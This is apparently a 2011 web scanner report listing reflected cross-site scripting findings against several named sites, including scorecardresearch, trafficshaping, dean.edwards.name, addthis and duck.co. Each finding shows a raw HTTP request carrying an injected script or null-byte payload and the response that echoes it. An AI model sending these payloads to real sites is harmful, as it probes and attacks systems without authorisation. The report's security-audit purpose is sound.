| HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:44:53 GMT Date: Sun, 27 Feb 2011 16:44:53 GMT Connection: close Content-Length: 3594 if(typeof COMSCORE=="undefined") ...[SNIP]... n(a){try{var c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"2113", c3:"20aecfe<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://b.scorecardre |
| Path: | /beacon.js |
| GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:44:59 GMT Date: Sun, 27 Feb 2011 16:44:59 GMT Connection: close Content-Length: 3594 if(typeof COMSCORE=="undefined") ...[SNIP]... r c=[],f,b;a=a||_comscore COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"48378fcd2<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://b.scorecardre |
| Path: | /beacon.js |
| GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:45:00 GMT Date: Sun, 27 Feb 2011 16:45:00 GMT Connection: close Content-Length: 3594 if(typeof COMSCORE=="undefined") ...[SNIP]... =a||_comscore;for(b=a COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"283806569b<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://b.scorecardre |
| Path: | /beacon.js |
| GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://ads.undertone.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=6d0f24-24.143.206.42 |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Sun, 06 Mar 2011 16:45:01 GMT Date: Sun, 27 Feb 2011 16:45:01 GMT Connection: close Content-Length: 3594 if(typeof COMSCORE=="undefined") ...[SNIP]... mscore;for(b=a.length-1;b COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"ed016<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://cdn.widgetserver |
| Path: | /syndication/platform |
| GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:45:07 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56347 if(!window.WIDGETBOX){ ...[SNIP]... get","fif":"aol"}, configurationParams : {"wbx_at":"http://cdn4 processPathParameters : function(){ var fifMode = WIDGETBOX.platform if(fifMode && WIDGETBOX.platform ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://cdn.widgetserver |
| Path: | /syndication/platform |
| GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:26 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56525 if(!window.WIDGETBOX){ ...[SNIP]... 75-95ef3e434575", configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://cdn.widgetserver |
| Path: | /syndication/platform |
| GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:31 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526 if(!window.WIDGETBOX){ ...[SNIP]... ef3e434575","platform": configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://cdn.widgetserver |
| Path: | /syndication/platform |
| GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:38 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526 if(!window.WIDGETBOX){ ...[SNIP]... 75","platform": configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://cdn.widgetserver |
| Path: | /syndication/platform |
| GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:45 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526 if(!window.WIDGETBOX){ ...[SNIP]... ","platform":"Insert configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://cdn.widgetserver |
| Path: | /syndication/platform |
| GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:52 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526 if(!window.WIDGETBOX){ ...[SNIP]... latform":"InsertWidget", configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://cdn.widgetserver |
| Path: | /syndication/platform |
| GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:59 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526 if(!window.WIDGETBOX){ ...[SNIP]... rm":"InsertWidget","fif": configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://cdn.widgetserver |
| Path: | /syndication/platform |
| GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:45:48 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 18572 if(!window.WIDGETBOX){ ...[SNIP]... GETBOX.platform })(); WIDGETBOX.platform initializationParams : {"id":"8f8e2793-e99e-41bf configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://cdn.widgetserver |
| Path: | /syndication/platform |
| GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:45:54 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56534 if(!window.WIDGETBOX){ ...[SNIP]... .platform.WidgetConfig = WidgetConfig; })(); WIDGETBOX.platform initializationParams : {"id":"8f8e2793-e99e-41bf configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://cdn.widgetserver |
| Path: | /syndication/platform |
| GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:02 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526 if(!window.WIDGETBOX){ ...[SNIP]... true); } }; WIDGETBOX.platform })(); WIDGETBOX.platform initializationParams : {"platform":"InsertWidget configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://cdn.widgetserver |
| Path: | /syndication/platform |
| GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:09 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56534 if(!window.WIDGETBOX){ ...[SNIP]... true); } }; WIDGETBOX.platform })(); WIDGETBOX.platform initializationParams : {"id":"8f8e2793-e99e-41bf configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://cdn.widgetserver |
| Path: | /syndication/platform |
| GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:16 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526 if(!window.WIDGETBOX){ ...[SNIP]... "8f8e2793-e99e-41bf-8b75 configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://cdn.widgetserver |
| Path: | /syndication/platform |
| GET /syndication/platform Host: cdn.widgetserver.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Content-Type: application/x-javascript Date: Sun, 27 Feb 2011 16:46:20 GMT P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA" Server: Apache/2.2.3 (Red Hat) Vary: Accept-Encoding Content-Length: 56526 if(!window.WIDGETBOX){ ...[SNIP]... 41bf-8b75-95ef3e434575", configurationParams : {"wbx_at":"http://cdn4 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://cds.sun.com |
| Path: | /is-bin/INTERSHOP |
| GET /is-bin/INTERSHOP Host: cds.sun.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:28:33 GMT Server: Apache/2.0.59 (Unix) Content-Length: 20208 Set-Cookie: sid=prDf2DxIwjnf2nEh Set-Cookie: pgid=yYdgaHqkkjVSR0E Cache-Control: no-cache,no-store,must Pragma: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: CDS_DETECT=detect; Domain=.sun.com; Path=/ Accept-Ranges: bytes Connection: close Content-Type: text/html;charset=utf-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... elimiter="&" parametername="goto" currenturl="https://cds ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://client.traff |
| Path: | /signin |
| GET /signin?email=1b192"><script>alert(1)< Host: client.trafficshaping.com Connection: keep-alive Referer: http://trafficshaping.com Cache-Control: max-age=0 Origin: http://trafficshaping.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: csId=3922e3f116c2b71 |
| HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:44:48 GMT Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.3.3-0.dotdeb.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: csId=deleted; expires=Sat, 27-Feb-2010 16:44:47 GMT Vary: Accept-Encoding Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 4659 <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>TrafficShaping - Sign into Your Account</title> <meta name="description" conten ...[SNIP]... <input type="text" size="30" name="email" value="1b192"><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://dean.edwards.name |
| Path: | /weblog/2006/03/faster |
| GET /weblog%0070e78<a>271d7883f11/2006/03/faster HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:07 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1644 Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html> <head> <title>/404</title> <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://deanedw ...[SNIP]... <a>271d7883f11/">weblog ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://dean.edwards.name |
| Path: | /weblog/2006/03/faster |
| GET /weblog%00dcea7"><script>alert(1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:06 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1790 Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html> <head> <title>/404</title> <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://deanedw ...[SNIP]... <a href="/weblog%00dcea7"><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://dean.edwards.name |
| Path: | /weblog/2006/03/faster |
| GET /weblog/2006/03/fasterc01ec<a>2a3ca83c34f HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:17 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name Expires: Sat, 26 Feb 2011 23:20:17 GMT Last-Modified: Sat, 26 Feb 2011 23:20:17 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1352 Connection: close Content-Type: text/html; charset=UTF-8 <!doctype html> <html> <head> <title>dean.edwards.name <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://deanedwards ...[SNIP]... </a>/fasterc01ec<a>2a3ca83c34f</h1> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://dean.edwards.name |
| Path: | /weblog/2006/06/again/ |
| GET /weblog%0078f44"><script>alert(1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:49 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1790 Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html> <head> <title>/404</title> <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://deanedw ...[SNIP]... <a href="/weblog%0078f44"><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://dean.edwards.name |
| Path: | /weblog/2006/06/again/ |
| GET /weblog%00fa627<a>784e947c10e/2006/06/again/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:20:50 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1644 Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html> <head> <title>/404</title> <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://deanedw ...[SNIP]... <a>784e947c10e/">weblog ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://dean.edwards.name |
| Path: | /weblog/2006/06/again/ |
| GET /weblog/2006/06/againf526a<a>bc4d18aee79/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Date: Sat, 26 Feb 2011 23:21:27 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name Expires: Sat, 26 Feb 2011 23:21:28 GMT Last-Modified: Sat, 26 Feb 2011 23:21:28 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1352 Connection: close Content-Type: text/html; charset=UTF-8 <!doctype html> <html> <head> <title>dean.edwards.name <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://deanedwards ...[SNIP]... </a>/againf526a<a>bc4d18aee79/</h1> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://dean.edwards.name |
| Path: | /weblog/2006/06/again/ |
| GET /weblog/2006/06/again/?d8539"><script>alert(1)< Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:20:07 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name Link: <http://dean.edwards.name Expires: Sat, 26 Feb 2011 23:20:07 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 214711 <!doctype html> <html> <head> <title>Dean Edwards: window.onload (again)</title> <meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) --> <link rel="stylesheet" href="http://d ...[SNIP]... <form class="contact" action="/weblog/2006/06 ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://ds.addthis.com |
| Path: | /red/psi/sites/www |
| GET /red/psi/sites/www Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2CMjAwMDFOQVV |
| HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 290 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 28 Feb 2011 17:51:50 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 30 Mar 2011 17:51:50 GMT; Path=/ Set-Cookie: di=%7B%222%22%3A P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Mon, 28 Feb 2011 17:51:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 28 Feb 2011 17:51:50 GMT Connection: close _ate.ad.hpre135a<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://ds.addthis.com |
| Path: | /red/psi/sites/www |
| GET /red/psi/sites/www Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2CMjAwMDFOQVV |
| HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 01 Mar 2011 13:41:52 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 31 Mar 2011 13:41:52 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Tue, 01 Mar 2011 13:41:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 01 Mar 2011 13:41:52 GMT Connection: close _ate.ad.hprf3a3a<script>alert(1)< |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | / |
| GET /?b0edc"><script>alert(1)< Host: duck.co Proxy-Connection: keep-alive Referer: http://duckduckgo.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Set-Cookie: zdccn=3eff0436-e0c8-4bca Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=3BEEEE0BE Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Tue, 01 Mar 2011 02:01:23 GMT Server: Apache-Coyote/1.1 Content-Length: 270121 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /duckduckgo-forum |
| GET /duckduckgo-forum?5c136"><script>alert(1)< Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
| HTTP/1.1 200 OK Pragma: no-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=DEA1960F4 Content-Type: text/html;charset=UTF-8 Date: Tue, 01 Mar 2011 02:53:10 GMT Server: Apache-Coyote/1.1 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="S ...[SNIP]... <a href="/portalLogin.do ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://duck.co |
| Path: | /topic/2-25-news-stories |
| GET /topic/2-25-news-stories Host: duck.co Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=B7BE3E6E4 |
